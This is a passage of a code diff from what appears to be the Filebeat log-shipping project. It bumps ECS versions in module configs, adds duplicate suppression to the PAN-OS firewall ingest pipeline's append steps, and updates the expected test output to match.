"user_agent.device.name": "Mac", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0", diff --git a/x-pack/filebeat/module/oracle/database_audit/config/config.yml b/x-pack/filebeat/module/oracle/database_audit/config/config.yml index 351a4c26f7d1..09552183e0de 100644 --- a/x-pack/filebeat/module/oracle/database_audit/config/config.yml +++ b/x-pack/filebeat/module/oracle/database_audit/config/config.yml @@ -18,4 +18,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/panw/panos/config/input.yml b/x-pack/filebeat/module/panw/panos/config/input.yml index 3d3f0be207f0..8fa5bd129585 100644 --- a/x-pack/filebeat/module/panw/panos/config/input.yml +++ b/x-pack/filebeat/module/panw/panos/config/input.yml @@ -209,4 +209,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml b/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml index 3bf76a0c5c17..42d2f4ff9c17 100644 --- a/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml +++ b/x-pack/filebeat/module/panw/panos/ingest/pipeline.yml @@ -385,21 +385,25 @@ processors: - append: if: 'ctx?.source?.ip != null' field: related.ip + allow_duplicates: false value: - '{{source.ip}}' - append: if: 'ctx?.destination?.ip != null' field: related.ip + allow_duplicates: false value: - '{{destination.ip}}' - append: if: 'ctx?.source?.nat?.ip != null' field: related.ip + allow_duplicates: false value: - '{{source.nat.ip}}' - append: if: 'ctx?.destination?.nat?.ip != null' field: related.ip + allow_duplicates: false value: - '{{destination.nat.ip}}' @@ -528,43 +532,51 @@ processors: - append: field: related.user + allow_duplicates: false value: "{{client.user.name}}" if: "ctx?.client?.user?.name != null" - append: field: related.user + allow_duplicates: false value: "{{source.user.name}}" if: "ctx?.source?.user?.name != null" - append: field: related.user + allow_duplicates: false value: "{{server.user.name}}" if: "ctx?.server?.user?.name != null" - append: field: related.user + allow_duplicates: false value: "{{destination.user.name}}" if: "ctx?.destination?.user?.name != null" - append: field: related.user + allow_duplicates: false value: "{{url.username}}" if: "ctx?.url?.username != null && ctx?.url?.username != ''" allow_duplicates: false - append: field: related.hash + allow_duplicates: false value: "{{panw.panos.file.hash}}" if: "ctx?.panw?.panos?.file?.hash != null" - append: field: related.hosts + allow_duplicates: false value: "{{observer.hostname}}" if: "ctx?.observer?.hostname != null && ctx.observer?.hostname != ''" allow_duplicates: false - append: field: related.hosts + allow_duplicates: false value: "{{url.domain}}" if: "ctx?.url?.domain != null && ctx.url?.domain != ''" allow_duplicates: false diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json index 54a45d4465e7..a6777dca5e6e 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_other.log-expected.json @@ -803,11 +803,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json index cf6c021da903..10ea226c1ee2 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_threat.log-expected.json @@ -75,11 +75,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -176,11 +174,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -278,11 +274,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -380,11 +374,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -482,11 +474,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -584,11 +574,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -686,11 +674,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -787,11 +773,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -888,11 +872,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -989,11 +971,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1091,11 +1071,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1191,11 +1169,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1292,11 +1268,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1393,11 +1367,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1495,11 +1467,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1596,11 +1566,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1693,11 +1661,9 @@ "related.ip": [ "192.168.0.2", "78.159.99.224", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1795,11 +1761,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1895,11 +1859,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1995,11 +1957,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2096,11 +2056,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2196,11 +2154,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2294,11 +2250,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2389,11 +2343,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2484,11 +2436,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2579,11 +2529,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2674,11 +2622,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2769,11 +2715,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2864,11 +2808,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2959,11 +2901,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3054,11 +2994,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3149,11 +3087,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3244,11 +3180,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3338,11 +3272,9 @@ "related.ip": [ "192.168.0.2", "69.43.161.167", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3436,11 +3368,9 @@ "related.ip": [ "192.168.0.2", "202.31.187.154", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3534,11 +3464,9 @@ "related.ip": [ "192.168.0.2", "89.111.176.67", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3634,11 +3562,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3732,11 +3658,9 @@ "related.ip": [ "192.168.0.2", "208.73.210.29", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3829,11 +3753,9 @@ "related.ip": [ "192.168.0.2", "208.73.210.29", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3929,11 +3851,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4026,11 +3946,9 @@ "related.ip": [ "192.168.0.2", "208.73.210.29", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4124,11 +4042,9 @@ "related.ip": [ "192.168.0.2", "89.108.64.156", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4221,11 +4137,9 @@ "related.ip": [ "192.168.0.2", "89.108.64.156", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4307,11 +4221,9 @@ "related.ip": [ "204.232.231.46", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4413,11 +4325,9 @@ "related.ip": [ "192.168.0.2", "216.8.179.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4509,11 +4419,9 @@ "related.ip": [ "192.168.0.2", "69.43.161.154", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4605,11 +4513,9 @@ "related.ip": [ "192.168.0.2", "208.91.196.252", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4702,11 +4608,9 @@ "related.ip": [ "192.168.0.2", "208.73.210.29", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4801,11 +4705,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -4900,11 +4802,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5000,11 +4900,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5100,11 +4998,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5200,11 +5096,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5289,11 +5183,9 @@ "related.ip": [ "173.236.179.57", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5395,11 +5287,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5484,11 +5374,9 @@ "related.ip": [ "91.209.163.202", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5579,11 +5467,9 @@ "related.ip": [ "122.226.169.183", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5684,11 +5570,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5773,11 +5657,9 @@ "related.ip": [ "109.201.131.15", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5865,11 +5747,9 @@ "related.ip": [ "91.209.163.202", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -5968,11 +5848,9 @@ "related.ip": [ "192.168.0.2", "213.180.199.61", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6065,11 +5943,9 @@ "related.ip": [ "192.168.0.2", "213.180.199.61", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6162,11 +6038,9 @@ "related.ip": [ "192.168.0.2", "213.180.199.61", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6251,11 +6125,9 @@ "related.ip": [ "173.236.179.57", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6357,11 +6229,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -6456,11 +6326,9 @@ "related.ip": [ "192.168.0.6", "207.46.140.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -6541,11 +6409,9 @@ "related.ip": [ "65.54.161.34", "192.168.0.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -6636,11 +6502,9 @@ "related.ip": [ "65.55.5.231", "192.168.0.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -6741,11 +6605,9 @@ "related.ip": [ "192.168.0.6", "65.54.71.11", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -6825,11 +6687,9 @@ "related.ip": [ "74.125.239.17", "192.168.0.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -6924,11 +6784,9 @@ "related.ip": [ "192.168.0.2", "208.85.40.48", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7008,11 +6866,9 @@ "related.ip": [ "74.125.224.198", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7100,11 +6956,9 @@ "related.ip": [ "188.190.124.75", "192.168.0.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -7194,11 +7048,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7285,11 +7137,9 @@ "related.ip": [ "74.125.239.3", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7376,11 +7226,9 @@ "related.ip": [ "74.125.239.3", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7467,11 +7315,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7566,11 +7412,9 @@ "related.ip": [ "192.168.0.2", "74.125.239.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7650,11 +7494,9 @@ "related.ip": [ "74.125.224.193", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7742,11 +7584,9 @@ "related.ip": [ "74.125.239.20", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7833,11 +7673,9 @@ "related.ip": [ "208.80.154.225", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -7925,11 +7763,9 @@ "related.ip": [ "208.80.154.234", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8017,11 +7853,9 @@ "related.ip": [ "65.54.75.25", "192.168.0.6", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -8111,11 +7945,9 @@ "related.ip": [ "74.125.224.206", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -8202,11 +8034,9 @@ "related.ip": [ "74.125.224.195", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -8294,11 +8124,9 @@ "related.ip": [ "207.178.96.34", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -8388,11 +8216,9 @@ "related.ip": [ "74.125.224.195", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8479,11 +8305,9 @@ "related.ip": [ "74.125.239.20", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8571,11 +8395,9 @@ "related.ip": [ "66.152.109.24", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8665,11 +8487,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8764,11 +8584,9 @@ "related.ip": [ "192.168.0.2", "74.125.224.201", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8848,11 +8666,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -8939,11 +8755,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "picard", "picard" ], "rule.name": "rule1", @@ -9038,11 +8852,9 @@ "related.ip": [ "192.168.0.2", "208.85.40.48", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -9122,11 +8934,9 @@ "related.ip": [ "74.125.224.201", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -9213,11 +9023,9 @@ "related.ip": [ "74.125.224.201", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -9304,11 +9112,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -9395,11 +9201,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -9487,11 +9291,9 @@ "related.ip": [ "74.125.224.198", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", @@ -9578,11 +9380,9 @@ "related.ip": [ "74.125.224.200", "192.168.0.2", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "jordy", "jordy" ], "rule.name": "rule1", diff --git a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json index 44f7a7790abc..a4ae1b157d9c 100644 --- a/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json +++ b/x-pack/filebeat/module/panw/panos/test/pan_inc_traffic.log-expected.json @@ -77,11 +77,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -176,11 +174,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -275,11 +271,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -377,11 +371,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -479,11 +471,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -578,11 +568,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -677,11 +665,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -779,11 +765,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -881,11 +865,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -983,11 +965,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1085,11 +1065,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1187,11 +1165,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1289,11 +1265,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1391,11 +1365,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1493,11 +1465,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1595,11 +1565,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1697,11 +1665,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1799,11 +1765,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -1901,11 +1865,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2000,11 +1962,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2099,11 +2059,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2201,11 +2159,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2300,11 +2256,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2402,11 +2356,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2504,11 +2456,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2606,11 +2556,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2705,11 +2653,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2804,11 +2750,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -2906,11 +2850,9 @@ "related.ip": [ "192.168.0.2", "98.149.55.63", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3008,11 +2950,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3107,11 +3047,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3209,11 +3147,9 @@ "related.ip": [ "192.168.0.2", "212.48.10.58", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3311,11 +3247,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3410,11 +3344,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3509,11 +3441,9 @@ "related.ip": [ "192.168.0.2", "205.171.2.25", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", @@ -3611,11 +3541,9 @@ "related.ip": [ "192.168.0.2", "204.232.231.46", - "0.0.0.0", "0.0.0.0" ], "related.user": [ - "crusher", "crusher" ], "rule.name": "rule1", 